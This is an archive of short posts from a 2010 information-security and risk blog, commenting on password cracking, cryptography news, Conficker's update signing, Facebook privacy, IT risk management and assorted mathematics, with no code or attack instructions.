Thursday, December 23, 2010

Calculus vs. Probability

I am trying out listening to podcasts on my – yes – iPod, during what was figuratively described to me as my “downtime”. In Zurich for me this means being on trams and trains, and walking between them or to them. So I went looking for captivating podcasts and of course ended up at the TED site, where you can download any number of interesting speakers and topics. I came across a short and poignant talk by mathematician Arthur Benjamin's on his formula for changing math education.

His simple approach is to switch from calculus being the pinnacle of math education to actually probability and statistics, because while the former is beautiful yet little used, the latter two topics are in fact very practical and in high demand. In short we need to better understand risk. Below is the full text of his short talk, where I have highlighted a few phrases in bold

Now, if President Obama invited me to be the next Czar of Mathematics, then I would have a suggestion

The mathematics curriculum that we have is based on foundation of arithmetic and algebra. And everything we learn after that is building up towards one subject. And at top of that pyramid, it's calculus. And I'm here to say that I think that that is the wrong summit of the pyramid ... that the correct summit -- that all of our students, every high school graduate should know -- should be statistics: probability and statistics. (Applause)

I mean, don't get me wrong. Calculus is an important subject. It's one of the great products of the human mind. The laws of nature are written in the language of calculus. And every student who studies math, science, engineering, economics, they should definitely learn calculus by the end of their freshman year of college. But I'm here to say, as a professor of mathematics, that very few people actually use calculus in a conscious, meaningful way, in their day to day lives. On the other hand, statistics -- that's a subject that you could, and should, use on daily basis. Right? It's risk. It's reward. It's randomness. It's understanding data.

I think if our students, if our high school students -- if all of the American citizens -- knew about probability and statistics, we wouldn't be in the economic mess that we're in today. Not only -- thank you -- not only that ... [but] if it's taught properly, it can be a lot of fun. I mean, probability and statistics, it's the mathematics of games and gambling. It's analyzing trends. It's predicting the future. Look, the world has changed from analog to digital. And it's time for our mathematics curriculum to change from analog to digital. From the more classical, continuous mathematics, to the more modern, discrete mathematics. The mathematics of uncertainty, of randomness, of data -- and that being probability and statistics.

In summary, instead of our students learning about the techniques of calculus, I think it would be far more significant if all of them knew what two standard deviations from the mean means. And I mean it. Thank you very much. (Applause)

I could not agree more. The world is discrete for me, and very few of the problems that I encounter succumb to integration.

Protecting Your Information in the Age of WikiLeaks

This is the title of a webcast invitation that I recently received from Symantec. The Wikileaks saga is quickly impacting the infosec landscape, probably because the issue is so visible to all levels of senior management. The webcast is described as follows
In the wake of the intense media attention around the WikiLeaks disclosures, you may be asking yourself, "What steps can I take to help my company avoid this same fate?"

Symantec has been working with customers who are concerned about preventing these same issues and we’ve developed a set of best practices that can help defend against these types of breaches. We’d like to share with you some of the techniques that might be useful to help you uncover similar activity on your own systems. In this live webcast we’ll:
• Discuss the threat agents and modes of data loss you should be most concerned about
• Recommend counter-measures to protect your critical information against these risks

2011 InfoSec Predictions from Zscaler Labs

Its not only the season of giving and but forecasting as well, and I recently received the following Information Security Predictions from Zscaler Labs
• Flash mob hacktivism – we’ll see more attacks similar to Operation Payback, where like-minded strangers quickly organize and attack corporations or government entities in the name of a cause
• Niche malware designed to harvest confidential information from IP-connected devices such as printers and SCADA systems will grow
• Cloud-hosted botnets will grow
• We’ll hear about more indirect data breaches, where not it’s the company affected that was breached, but rather a third-party vendor or organization
• Social networks will become the main communication medium for attackers
• The Information security market will continue to shrink
An interesting list - more about trends than fundamentals - and you can find more details on the Zscaler blog.

Over 1,000 visits this month to old AES-256 post

Just a note to say that my Are AES 256-bit keys too large? post from July 2008 has been visited over 1,000 times this month. For the last few years it has been my most popular post by far, and I once referred to it as one of my Pareto posts. Probably what happened this month is a link to the post found its way onto some social channel, like Twitter, and just mushroomed from there. It just shows that content really has no use-by date in Web 2.0.

Tuesday, December 14, 2010

Tutorial on Buffer Overflows

Nice tutorial on this perennial security problem from Patrick Schaller of ETH, Zurich.

Tuesday, December 7, 2010

Internet Privacy as a Venn diagram

From Flowing Data:

Monday, December 6, 2010

Snakes in Suits – the risks from psychopaths in the workplace

A telling presentation from Holly Andrews at a recent IRM meeting on dealing with psychopaths in the workplace (and yes the boardroom), derived from the 2006 book Snakes in Suits: When Psychopaths Go to Work. The presentation describes how workplace psychopaths burrow into positions of power, and amongst other things, assume more risk than is sensible. There is a wonderful process chart which shows how such people operate

Transitional organisations can be seen as ideal “feeding grounds” for psychopaths since

• There are fewer constraints and rules allow the psychopath freedom in acting out their psychopathic manipulation
• The fast changing environment provides stimulation for the psychopath whilst serving to cover up their failings
• There is the potential for large rewards in terms or money, power, status and control

Thursday, October 28, 2010

Just over 100,000 reads of my Scribd documents

Just a note to say that the total number of read of my documents on Scribd just passed 100,000! The categories are given below,  mostly PDFs and a few PowerPoint presentations.

Tuesday, September 14, 2010

BP and Trial by PageRank

Over at the NSIS, Alex has a post (downgraded to a rant?) which begins with berating Gideon Rasmussen for calling the BP Deepwater incident a Black Swan, and ends up discussing flaws in corporate governance. Alex correctly describes the incident as a “tail event”, both low probability and high impact but still “on the curve”. True Black Swans are events for which prior distributions are “completely uninformative”, and they belong on a totally different curve to expectations and models.

Even so, for me a Black Swan aspect of the incident has been the subsequent reputational damage to BP. This has not been a trial by public media, but trial by social media and ultimately, trial by PageRank. In web 2.0 there is no such thing as yesterday’s news, or yesterday’s newspapers wrapping up today’s fish and chips. Links are just as good today as they were yesterday, and continue to remain search-worthy far into the future as long as PageRank deems them to be so. Holding steady at approximately two thirds of the search market, Google via PageRank has become the default arbiter of Internet truth.

A recent article called What Big Brands are spending on Google from Advertising Age showed that BP’s spending on Google Ads increased dramatically, to almost \$3.6 million dollars in June, up from its regular budget of less than \$60,000.

That’s almost a 6000% increase in spending at the height of the BP counter-PageRank campaign, and such unpredictable jumps are the calling cards of Black Swans.  From the article

Before BP could stem the oil gusher at the bottom of the Gulf of Mexico, it unleashed \$100 million in ad spending, largely on network TV, to stem the damage to its image. But it also started spending heavily where it had never spent much before: buying ads in Google's search results.

Friday, September 10, 2010

Keyword Spamming with Infographics

Infographics have become more popular, and BuzzFeed has produced an infographic describing how infographics are used to generate keyword spam. The trick to stopping the spam appears to be adding a NO FOLLOW tag in the html code of the embedded infographic.

References to Homomorphic Encryption

Homomorphic encryption is the basis of Craig Gentry’s recent breakthrough in encrypted search. Helger Lipmaa has a large collection of papers on homomorphic encryption here, as well as other cryptographic topics. Knock yourself out.

Five Lectures on Anonymous Communications

George Danezis has put together a great series of lectures on modern anonymous communications, available from his Conspicuous Communication blog here. The lectures cover

1. Basic definitions & unconditional anonymity with DC-networks.
2. Long-term attacks on anonymity systems (Statistical / Disclosure) and their Bayesian formulation.
3. Mix networks and anonymity metrics.
4. The Bayesian traffic analysis of mix networks.
5. Low-latency anonymity with onion routing and crowds.

Sunday, September 5, 2010

How to render SSL Useless – video version

A while back I posted on the  How to render SSL Useless deck from Ivan Ristic of SSL Labs (now with Qualys) on common mistakes in the deployment of SSL. There is now a video of Ivan presenting this deck at a recent OWASP conference, available at ThreatPost.

I just came across HeadHacker, a site devoted to social engineering, run by a former colleague Dale Pearson. The site looks great and Dale will be a speaker at the upcoming hashdays conference in Lucerne this November.

Will there be an IT Risk Management 2.0?

This is the title of a short talk I gave recently at an OWASP chapter meeting in Zurich. The audience was small but engaged, and I went over time by quite a bit.  I need to develop the talk further but it is a decent v1.0.

Saturday, August 28, 2010

The Blank Swan

There is  a new book, published in April, called The Blank Swan: The End of Probability. This is a clever title and the front photo is wonderful as well.

The book seems to be saying that financial market processes simply cannot be captured using the conventional notions of probability. The author writes in summary

The current crisis has led us to a conceptual impasse regarding the financial market. No prediction model can apply to the market …

Probability has to be discarded and a new category has to emerge instead, which will mediate contingency …

In fact, the market has nothing to do with Wall Street or with the investment banks. Market-making is a creative activity. The market is a category of thought that is independent of ideology. It replaces probability altogether and discarding the market, like the philosophers of the radical change claim we should do, is like discarding probability!

Not a very positive review from Reading the Markets, who found the book quite hard to read. There is some discussion on a Wilmott mailing list as well.

Searching an Encrypted Cloud

There is a post over at the Enterprise Search blog with some pointers to encrypted search, including my own overview. There is a link to a whitepaper from Seny Kamara and Kristin Lauter of the Microsoft Research Cryptography Group, proposing an architecture for a virtual private storage service which supports the following properties

• confidentiality
• integrity
• non-repudiation
• availability
• reliability
• efficient retrieval
• data sharing

Cool A5/1 back-clocking graphic

Below is part of a graphic which depicts the A5/1 state space generated when checking if the correct key has been determined from a rainbow table lookup. Once a key candidate has been found using the rainbow tables, the A5/1 cipher needs to be advanced (forward clocked) and undone (back-clocked) to verify that the candidate key is correct.

The grey paths represent states that are not accessible through forward clocking, and the green paths have many ancestor states leading to the same key stream. Red paths have few ancestor states leading to the same key stream. The graphic is from the A5/1 rainbow table generation project led by Karsten Nohl.

Friday, August 27, 2010

GPU Judgement Day for short Passwords

Researchers from the Georgia Tech Research Institute have announced that the power of GPU processors now poses a real threat to password security, and by implication, to the security of critical IT infrastructure. Top of the line GPU devices now process at the rate of 2 Teraflops second, which is around 30% of the computing power the fastest computing cluster could muster 10 years ago for a price tag of over \$100 million. Given that the main GPU manufacturers have made their devices programmable through standard C libraries, password cracking has become democratized.

The researchers state that 7 character passwords are now totally insecure against exhaustive attacks and recommend 12 characters, drawn from the full 94 printable keyboard characters. GPU processors can also be used to generate rainbow tables for offline password cracking, which was the approach taken recently by Karsten Knol to building rainbow table using CUDA nodes.

Of course, applying GPU devices to password creaking is not new, and Elcomsoft has made a name for itself using high-end gaming chips to recover and benchmark passwords. I am a little surprised that the researchers did not mention this. In any case, Elcomsoft has a great blog and you can find a good presentation on GPU password cracking here.

From my post The spin on passwords for AES

Adding spin to password-based computations is a workaround to the unpleasant fact that human habits and memory are vastly outmoded in today's IT environment. Everything is getting faster, better and cheaper - except us. Passwords remain the most toxic asset on the security balance sheet, but don't expect a bailout any time soon.

De-obfuscating the RC4 layer of Skype

Sean O'Neil, a security developer (or at least an amateur one), has posted code that is binary-compatible with an obfuscated version of RC4 that is used to protect Skype control traffic (user searches, profiles, contact lists). O’Neil says that the obfuscated version of RC4 is keyless and serves no useful security purpose, but its presence is intended to render Skype incompatible with other messaging clients, effectively making it a proprietary system. Even though Skype was intending to open its APIs to all desktop clients soon enough, O’Neil sees himself as buster of Skype’s 10 year monopoly.

The story is being widely reported in the press (see links below), and it is easy to assume that the general security of Skype has been compromised, especially when O’Neil’s own post carried the title Skype’s Biggest Secret Revealed. But the secret was disentangling the modified version of RC4 from Skype’s operation. User privacy remains protected since full strength versions of AES-256, RSA-1024 and RSA-2048 are used to encrypt session traffic. The code itself is surely obfuscated since the source is over 2800 lines of C, when 50 or so is enough to implement RC4.

The full implications of the discovery are still playing out, and whether losing their biggest secret poses a serious issue for Skype. O’Neil is promising to release more details at the Chaos Communication Conference in Berlin this December.

Thursday, August 26, 2010

Uno, dos, DDoS

Here is a Flash rendering of a FreeMind map I made from the excellent post Surviving Cyber War: A Primer on DDoS by Richard Stiennon, which appeared last November. The post traces the history of DDoS, looks at the people and technologies involved, and tells the story of the unlikely (then) 25-year-old hero Barrett Lyon.

Wednesday, August 25, 2010

IT Security Trends FreeMind map from 2008

I recently uploaded a large FreeMind map that I collected over 2008, in an effort to get a handle on the stream of security articles, reports and incidents taking place back then. In short there was a torrent and it remains much the same today. I think you might find the ad hoc classification of material useful, as well as the groups of sources.

Note that links to items from FIRST (Forum of Incident Response and Security Teams) are now broken since their once excellent news service has been discontinued.

All sources for my security and risk FreeMind maps are available here.

12 bits of default entropy for Speedport WPA routers

The H has reported that the default WPA key settings for the Speedport W 700V ADSL Wi-Fi routers are weak since at most 4096 guesses are required to recover the key. The key is mostly populated with a collection of fixed fields (for example keys always begin with the prefix "SP-") and other public information such as the MAC address of the router. The devices are apparently supported by all major German Telecoms, and presumably popular amongst the 26 million or so German households that have wireless. Of course the owners of the routers can change the default WPA key, but its a safe bet to assume that most people probably need to be reminded of this precaution. Germany's top criminal court recently made it illegal to offer wireless services that are not protected by a password, which is not a good sign that strong passwords are the norm.

How to reason about IT Security Risks

I have been meaning for some time to post a link to this wonderful paper from late 2007 on the top information security risks for the then coming year. The paper was a collaborative work from several groups of security professionals, led by Gary Hinson, keeper of the fantastic NoticeBored site of security awareness material. The paper is excellent in that it clearly separates threats, vulnerabilities and impacts, and then creates risks as scenarios from the interplay of these three collections, with controls coming as final recommendations. The whole approach just seems so clean and sensible, and demonstrates the distinctions amongst risk terms which sometimes get lost in our daily language.

Now added to my IT Risk collection on Scribd, thanks to Gary Hinson for removing the copyright protection.

Tuesday, August 24, 2010

Recent PhD Thesis on IT Risk Management

The 2008 PhD thesis of Domenico Salvati from the Laboratory for Safety Analysis at ETH, Zurich, on the Management of Information System Risks is available online. Salvati presents a structured approach to the IT risk management process which has some novel differences as compared to the more familiar frameworks. The thesis contains a long examples on computing the risk of a brute force password attack, and the risk of phishing attacks. The work has a very practical flavour as Salvati was sponsored by Credit Suisse for the thesis, as part of ZISC.

You can find a short bio on Domenico as part of the upcoming hashdays security and risk conference in Zurich.

Thursday, August 19, 2010

Evidence that the McEliece Cryptosystem is resistant to Quantum Computing Attacks

A paper was posted on the preprint server Physics arXiv showing that the McEliece public key cryptosystem is resistant to efficient quantum algorithms based on the ideas of Shor’s algorithm, which famously yielded an efficient method for factoring integers. From the abstract

Quantum computers can break the RSA and El Gamal public-key cryptosystems, since they can factor integers and extract discrete logarithms. If we believe that quantum computers will someday become a reality, we would like to have post-quantum cryptosystems which can be implemented today with classical computers, but which will remain secure even in the presence of quantum attacks. In this article we show that the McEliece cryptosystem over rational Goppa codes resists precisely the attacks to which the RSA and El Gamal cryptosystems are vulnerable---namely, those based on generating and measuring coset states.

Shor’s algorithm is a general method for computing the period of certain functions, and it can be applied to computing the orders of elements modulo a composite number for example (see my post Quantum Computing: are you Shor? for some details). Shor’s algorithm is not directly applicable to the McEliece cryptosystem since it is based on a hard problem from coding theory, and is not obviously solvable by computing periods of functions. The new paper seems to demonstrate that no connection will be found.

However the authors caution that there may be another quantum approach distinct from the principles of Shor’s algorithm that efficiently breaks the McEliece cryptosystem. On the other hand, there is a growing consensus that NP-complete problems do not have efficient quantum algorithms (see the diagram in this post), and the McEliece cryptosystem is based on an NP-hard problem (which means it is at least as hard as an NP-complete problem).

There is also a nice background post on the physics arXiv blog.

Tuesday, August 17, 2010

Imperva recently announced an update to their analysis of the 32 million passwords that were exposed by the RockYou site earlier this year. The update is concerned with a specific analysis of the spanish passwords included in the breach, of which there were just over 2 million. Imperva together with Spanish marketing firm Agua Marketing found the following breakdown of password preferences – note that almost half of the passwords are based on personal names.

The full report in Spanish is here.

Sunday, August 15, 2010

Short cryptography lecture from Scott Aaronson

Here is a short cryptography lecture from Scott Aaronson, delivered as part of his Quantum Computing Since Democritus course given at the University of Waterloo, Fall 2006. The lecture gives a short text-based overview of crypto from mainly a complexity point of view, and discusses some of the implications of the “P = NP?” question for crypto.

Tuesday, August 3, 2010

Recent spike in reads of AES posts

Just a note to say that over the last few days there has been a jump in reads on a few of my AES posts, in particular for Are AES 256-bit keys too large? and AES-256 and Reputational Risk. I can't find any obvious reason why, however these posts do appear amongst the top google search results for "aes 256" or "aes-256".

Friday, June 11, 2010

Detecting SSL/TLS legacy session Renegotiation

Back in November I posted on The TLS Renegotiation Attack for the Impatient, which I hoped was a plain English explanation of this new weakness in SSL and TLS (at the end of the post you can find less plain explanations and links). The weakness was quickly addressed by the IETF a few months later. There is a new review of the attack from nCircle and also a link to the detailed steps that can be taken to specifically detect servers which still run legacy versions of the protocols susceptible to the attack.

Saturday, May 29, 2010

The half-life of a YouTube video is 6 Days

A very interesting chart from Business Insider which shows that a YouTube video gets half its views in the first 6 days of it being published, down from 14 days in 2008. By way of comparison, computer vulnerabilities have a half-life closer to 30 days, meaning that our video attention span is much shorter than our patching cycles.

The data is provided by TubeMogul.

Thursday, May 27, 2010

I recently posted in The Search for Encrypted Search an overview of the breakthrough last year made by Craig Gentry of IBM to search data while it is in encrypted form. The breakthrough was largely theoretical since the required computational overhead to support encrypted search is huge, which for example would increase the time for a Google search by roughly a factor of a trillion.

In such cases, it is always an open question as to whether the breakthrough will stand as an unimprovable milestone, or be the beginning of series of improvements towards a practical solution. We now have the first evidence that we are dealing with the latter case for encrypted search.

A press release from the University of Bristol in the UK reports that

Nigel Smart, Professor of Cryptology in the Department of Computer Science at the University of Bristol, will present a paper in Paris this week [Friday 28 May], which makes a step towards a fully practical system to compute on encrypted data. The work could have wide ranging impact on areas as diverse as database access, electronic auctions and electronic voting.

Professor Smart said: “We will present a major improvement on a recent encryption scheme invented by IBM in 2009.”

“Our scheme allows for computations to be performed on encrypted data, so it may eventually allow for the creation of systems in which you can store data remotely in a secure manner and still be able to access it.”

Together with Frederik Vercauteren, from the Katholieke University Leuven in Belgium, Smart has simplifed Gentry’s scheme so that it becomes more practical - not totally so, but an improvement. More information should be available after the paper is published.

Wednesday, May 26, 2010

A look back at posts in May 2009

This time last year I made some of my favourite posts. First I celebrated that I had reached about 1,000 visits and 2,000 page views a month, and now I am about double that.

Rethinking Thresholds for Account Lockouts was a simple post asking if the 3-strikes-your-out password policy makes sense. I posted my second Password Roundup #2, and reviewed from Qualys their study on The Half-life of Vulnerabilities is still 30 Days.

I also developed some thoughts why web app bugs don’t get fixed in The \$28,000 Question: Project vs. Production Risk, after Jeremiah Grossman estimated that 28,000 well-spent dollars could fix the bugs at many sites.

On the crypto side I broke some news about The cost of SHA-1 collisions reduced to 2^{52}, and took a look at AES-256 and Reputational Risk. The AES post is now on the first page of a Google search for “aes 256” and has brought a steady flow of visits since last May, 1346 in total. I also asked if anyone could verify that the Total Internet computational power = 2^{85} operations, a statement I read in an ECRYPT report. I ended up contacting the authors and nope, no one knows where is came from. Sounds possible though.

I also posted The Sub-Time Crisis in Web 2.0, my thoughts on information overload in Web 2.0. I only used half the text I typed in from my written notes.

A nice how-to article on protecting USB drives with a password and encryption using Windows Vista or 7 and Bitlocker.

Do you carry sensitive data in your pen drive? Then you should carefully keep your pen drive. Oh! You mean you are not that careful too. Then I would suggest that you should password protect your pen drive. Yes folks, you can do this by a simple method. This is an added advantage to Windows Vista and Windows 7 users that they can easily password protect their pen drives with the help of BitLocker Drive Encryption. Its an inbuilt feature of both of these operating systems.

This is just great.

Shark Fin Posts

I have been making daily posts this month, partly to see what people read on a given day, and what they keep on reading. Quite a few of the posts turn out to have a hit graph that looks like a shark fin. Here is the one for What is the LINPACK rating of Conficker?

What the graph shows is that there are no hits before the post is published (of course!), then a spike when it first appears and for a few days after, ending in just a few hits by a week later or so. After that it’s up to Google, industrious visitors or self-referential posting to raise the hits again.

Google could help enforce new German wireless protection law

A German court has ruled that home users are responsible for creating password-protected home wireless networks, and failing to do so could result in a fine a 100 euros. The rulings stems from a case where a musician sued the owner of a home WiFi network for illegally downloading his music, but since the network owner was away on holiday, the open network was being used by another third party.

The maximum fine of 100 euros (or about \$120) is about the same as a hefty speeding ticket, and with 26 million WiFi enabled German households, that could add up. All those Google Street View spycars could help out with enforcement of the law, since they have been collecting wireless information anyway.

Related articles by Zemanta

Tuesday, May 25, 2010

Whit Diffie does the Can Can

In Not so sunny for Whit Diffie I briefly posted on his unexpected exit from Sun soon after their acquisition by Oracle, and taking up a visiting academic position in the UK. Computerworld recently reported that Diffie has now landed a new position as vice president at ICANN, managing the security of their networks.

It seems he was just a bit too late to give his blessing to the recent commissioning of DNSSEC on each of the 13 authoritative names servers of the Internet. However there will be a formal key ceremony in June which may require a cryptographic high priest, or he may yet bag one of the coveted 14 crypto officers roles, to whom key recovery shares will be entrusted.

He also does a good impression of Gandalf the Brown.

Monday, May 24, 2010

Security Bloggers Network under attack?

Update: This is a hoax mail leading to a rogue site, so please don't click it. Check out the Lijit blog for details (via Alan).

Just got this from Lijit, the hosting firm for SBN

Facebook juggernauts towards 500 million users

AllFacebook.com has observed that, based on linear projections of current sign-up rates, Facebook will pass the 500 million user milestone by the end of June. Using population data published by the CIA, we will therefore soon have the situation where only China and India as countries will have more people than Facebook (1.33 and 1.56 billion respectively). Projecting further, Facebook will have twice as many people as the US by year end (around 600 million), and approximately a billion dollars in revenue as well.

It remains to be seen whether the current privacy backlash against Facebook introduces unpleasant non-linearities into these projections. A recent informal poll taken by Graham Cluley of Sophos, found that almost two thirds of the 1588 respondents are considering leaving Facebook. If we round up the respondents to an even 1600, and noting that Facebook has more than 320 million users currently, the survey represents a sample of less than 0.0005% of all users (that’s just 5% of 1% of 1% of the total). Even so, PC World has reported the survey under the headline Study: 60 Percent of Facebook Users Mulling to Quit which, I hope you will agree, is a bit grandiose. This is an example of how the non-linearities of reputational risk start accruing against a company with widespread and sustained bad press - and more will follow.

Privacy may yet be the Black Swan of Facebook.

Sunday, May 23, 2010

Interesting password graphic from CXO. I am not quite sure what the people axis is meant to show, or exactly what social class is represented by a Douche. In any case, the examples were verified by Google’s password strength meter, and give a good visual the password spectrum (click to enlarge).

Saturday, May 22, 2010

Y2Gay: gay marriage from the database perspective

This is a quite interesting post which the author describes as a “stream of consciousness about equal parts nuptial rights and Structured Query Language”. The author is actually taking a serious look at how to redesign your database to accommodate gay (same sex) marriages, with quite a few amusing digressions. After outlining 14 detailed steps to follow for the transformation, the conclusion is that
Perhaps the simplest solution would be to ban marriage outright. Or, better yet, to declare everybody as married to everybody else. But then what would the database engineers do all day?
There are 145 comments as well.

Friday, May 21, 2010

Why have there been so many Natural Catastrophes of late?

The Freakanomics blog reports that Foreign Policy magazine has responded to concerns that we are living in particularly harrowing times, experiencing more than our share of natural disasters. But FP reports that we are not. What we actually have is a heightened awareness that these events are occurring thanks to rapid and prolonged media coverage.

Based on U.S. Geological Survey records dating back to 1900, the Earth experiences 16 major earthquakes per year on average, where a major quake is one whose magnitude is 7.0 or more. There were only 6 major quakes in 1986 but 32 in 1943. And this year? 6 so far, so we might be headed for an above average year, but not an extreme year. However there is an increase in the loss of life from earthquakes (650,000 people last decade) due to the expansion of urban sites into fault zones. This is another factor which increases media coverage of these tragedies.

Thursday, May 20, 2010

Conficker, RSA and RC4

I was reading the excellent paper An Analysis of Conficker's Logic and Rendezvous Points from SRI and was surprised to learn that Conficker botnet updates are distributed at its rendezvous points as encrypted and signed binaries using RC4 and RSA (the “R” in both cases here stands for Ron Rivest). Both the A and B variants of Conficker use these checks to ensure that the updates have been created by the Conficker authors – just like any other software vendor issuing updates and patches. The paper depicts the update process as follows

So each Conficker client carries an RSA public key E for signature verification. A Windows binary file F is encrypted and signed as follows
• Hash F to produce a 512-bit hash M
• Encrypt F with RC4 using M as the key
• Sign M using private key D
A Conficker client authenticates the encrypted binary as follows
• Using the embedded public key E, compute the signature verification to recover M
• Decrypt the encrypted binary using RC4 and M as the key
• Verify that the hash of F is in fact M
For Conficker A, the RSA key is 1024-bits and 2048-bits for Conficker B, both of which are listed in the paper. That’s a large public key for Conficker B but it is dwarfed by the 512-bit symmetric key used in RC4. Yes RC4 can support such huge key sizes, and I will explain in a future post how this is possible.

Wednesday, May 19, 2010

Phishing and scamming in the new Top Level Domains

Earlier this month was the historic event of non-Latin domain names being introduced on the Internet by ICANN. While half the global internet population does not have a Latin language as their mother tongue, sites can now have Arabic names for example and eventually Chinese, Thai and Tamil.

At the blog of security company Sûnnet Beskerming they have a post which points out some security risks associated with the new non-Latin names
A risk, which isn't immediately obvious, is that this opens up a new world of opportunity for scammers and phishers to register domains that will visually appear very similar to legitimate sites in the address bar, but which will have a base address significantly different, thanks to being registered in a non-Latin script. By relying on alternate character rendering, this could cause problems for users who may not be able to determine the slight differences between otherwise similar looking characters. It also means that software and tools designed to help detect phishing or XSS attacks will have to expand their repertoire significantly to interpret and assess a much broader range of character and rendering sets.
The opportunities for typosquatting will probably multiply, and the Register recently reported this market to be worth almost half a billion dollars annually now. You can read more about this market in Measuring Typosquatting Perpetrators and Funders by Tyler Moore from Cambridge University.

Tuesday, May 18, 2010

Two universities rethink Gmail migration plans

The University of California at Davis (UCD) and Yale University were considering moving their email systems onto Gmail, but both have put those plans on hold for the moment. The CIO of UCD, Peter Siegel, said that he was not prepared to risk the security or privacy of the school’s 30,000 faculty and staff.

Yale has delayed a more general migration to Google apps, including Gmail, citing security and privacy concerns over cloud-based management of their data. Michael Fischer, a computing professor, said that
Google stores every piece of data in three centers randomly chosen from the many it operates worldwide in order to guard the company’s ability to recover lost information — but that also makes the data subject to the vagaries of foreign laws and governments, Fischer said. He added that Google was not willing to provide ITS with a list of countries to which the University’s data could be sent, but only a list of about 15 countries to which the data would not be sent.
So there is a concern that the personal data of students and faculty is being stored outside US jurisdictions. However neither UCD or Yale ruled out migrating to Google cloud applications once there was adequate transparency for the protection of data.

Monday, May 17, 2010

10 Reasons Why Microsoft's Internet Explorer Dominance is Ending

It has been widely reported recently that Microsoft’s share of the global browser market has fallen below 60% for the first time. If this trends continues then Firefox is forecasted to overtake IE by Christmas 2012. Don Resinger at eWeek has given his reasons why IE is losing market share (and also mind share) as follows
1. The European Union
2. Microsoft's complacency
3. Internet Explorer's security
4. Rebounding from IE 6
5. The features aren't there
7. The united fight against Microsoft
8. The educated user
9. No-names are actually doing well
10. Microsoft is still lost on the Web

Sunday, May 16, 2010

Numerical Palindromes

Someone at work put up the following pattern on a whiteboard

1 x 1 = 1
11 x 11 = 121
111 x 111 = 12321
1111 x 1111 = 1234321
11111 x 11111 = 123454321
111111 x 111111 = 12345654321
1111111 x 1111111 = 1234567654321
11111111 x 11111111 = 123456787654321
111111111 x 111111111 = 12345678987654321

So squaring a number that is all 1’s gives a numerical palindrome. Why?

Well there is a nice simple visual answer
More on such patterns here.

Saturday, May 15, 2010

Great Security white papers and briefs from Damballa

Security provider Damballa has a great collection of what papers and briefs for download. I have listed a few below, most of which have already been uploaded to Scribd
Also don’t forget the recommendation I made on the technical overview at Compass Security, a Swiss company, about a year ago.

6 Hot And Sought-After IT Security Skills

Dark Reading has reported a short list of desirable skills in IT Security, partly because the “IT security job market is booming”. Apparently you’re quite marketable (particularly in the US) if your resume includes
1. Incident-handling/response
2. Compliance know-how
3. Risk management
5. Government security clearance
Frankly, I think if you had a sufficient quantity of skill number 4 you would not be in IT Security.

Friday, May 14, 2010

The EFF has an article on the changes to the privacy policy at Facebook over the last few years noting five significant changes (downgrades) since 2005. In short Facebook has flipped from a private social network to one where your data is largely public by default, mainly since Facebook can profit by selling this information to advertisers and business partners.

Here is the 2005 privacy language
No personal information that you submit to Facebook will be available to any user of the Web Site who does not belong to at least one of the groups specified by you in your privacy settings.
and the April 2010 version
When you connect with an application or website it will have access to General Information about you. The term General Information includes your and your friends’ names, profile pictures, gender, user IDs, connections, and any content shared using the Everyone privacy setting. ... The default privacy setting for certain types of information you post on Facebook is set to “everyone.” ... Because it takes two to connect, your privacy settings only control who can see the connection on your profile page. If you are uncomfortable with the connection being publicly available, you should consider removing (or not making) the connection
Quite a change. Matt McKeon has produced an interesting interactive infographic to depict privacy erosion on Facebook over the last 5 years

Thursday, May 13, 2010

1733 default vendor passwords now online

cirt.net has made 1733 default passwords for almost 400 vendors available online as a searchable database, complete with a FireFox plugin. Changing default passwords is security basics but its not always followed. Last year an Australian student wrote a worm which compromised jailbroken iphones with SSH installed where the default password had not been changed.

The Swan Song of Mark Curphey

About two months ago Mark Curphey (Security Buddha), in a confessional post, informed us all of his intentions to move on from IT Security, and reinvent himself 2.0-style into web technology, agile development, social software and user experience. He gave his reasons for moving on as follows
For the last few years I have grown increasing disillusioned with the security industry to the point where after nearly two years of thinking and talking about it I have decided that it’s time for me to move on. There is a long list of frustrations and I have seriously thought about a last detailed shot over the bow with some home truths as I see them. The reality is it will probably not be productive. I had commentary about the security circus and the clowns, ring masters and performance artists that play in the big top; commentary about the lack of genuine computer science that finds its way into security; commentary about the lack of business science that is being adopted (why aren’t security people obsessed by Freakonomics?); commentary about the sad fact that for the most part we are still doing “the same old shit” 15 years after I first started (the definition of insanity is to do the same thing twice and expect a different result); commentary about the farce of PCI (and related standards) and people caring about trivial issues (easy to understand and sensationalist in nature) when looming holes that could have major impacts go unnoticed …….I could go on. People thinking they need “purple dinosaur” features in their security software because some marketing spin says so and commentary about the sheer FUD being pumped out by the marketeers. I have watched an industry spin out of control largely paying lip service to the term risk and watched sectors of it become largely irrelevant outside of their own self-fulfilling set of prophesies. When things go right no one notices (at least outside of security) and when things go wrong everyone points fingers. That’s a tough place to be impactful and remain positive.
A tough place to be impactful and remain positive. Mark’s new blog is here, and he still seems to have a few comments to make on security yet.

Wednesday, May 12, 2010

Some quotes from my first 200 posts

My 200th post was sent the No Tricks blog yesterday, and to celebrate here are 30 or so quotes I quickly selected out of those posts.

The No Tricks Blog Name
The American basically asked "Why are you guys doing so much better than us?". The Japanese businessman is shown extending his fingers and counting off as he says "Your managers are greedy, your workers are lazy, and ...". But before he can finish even just the most obvious reasons, the American interrupts impatiently and says "I know, I know! But what's the trick?"
Excel is your new best friend
We can also stop beating ourselves up on the point that the weakness of IT Risk is the absence of data - the real weakness is poor modelling, and the decisions based on the output of such models.
Mr. Egerstad has stated that there is no security flaw with Tor - the real threat comes from user expectations that their message contents are being protected end-to-end by Tor, when in fact encryption is only applied to internal Tor network communication.
Flaws related to encryption always make good copy, and on occasion, strike at the heart of our fundamental beliefs in security. When encryption falters the whole edifice of security seems shaken.
This may seem an odd question given that since the mid 70's discussions about cryptographic keys have been mainly concerned about their potential shortness.
The Princeton team asked Nature the simple question of whether DRAM is cleared on power loss, and the simple answer is no.
A5/1 has operated unchanged for the last 21 years but it has now reached its cryptographic end-of-life, engulfed by the march of Moore's Law.
Intel's leading chip line, the x86, has steadily progressed from 286, 386, 486, Pentium and so on, but quantum computers will not be "1000-86" devices - unimaginably faster versions of what we have today.
Kapersky has decided to make AV scanning more efficient not by making it faster but by doing less, as determined by risk-based criteria.
It is common that once the torch of enterprise risk management is kindled in the higher corporate echelons, it is passed down the ranks and settles with IT Security people to assume responsibility for the management of IT Risk. And these people are ill-equipped to do so.
Perhaps this reasoning prevailed at Adobe when they recently upgraded their document encryption scheme from AES-128 in v8 to AES-256 in v9. However Adobe later had to announce that v9 in fact offers less security against brute force attacks as compared to v8. What went wrong? They forgot about the spin.
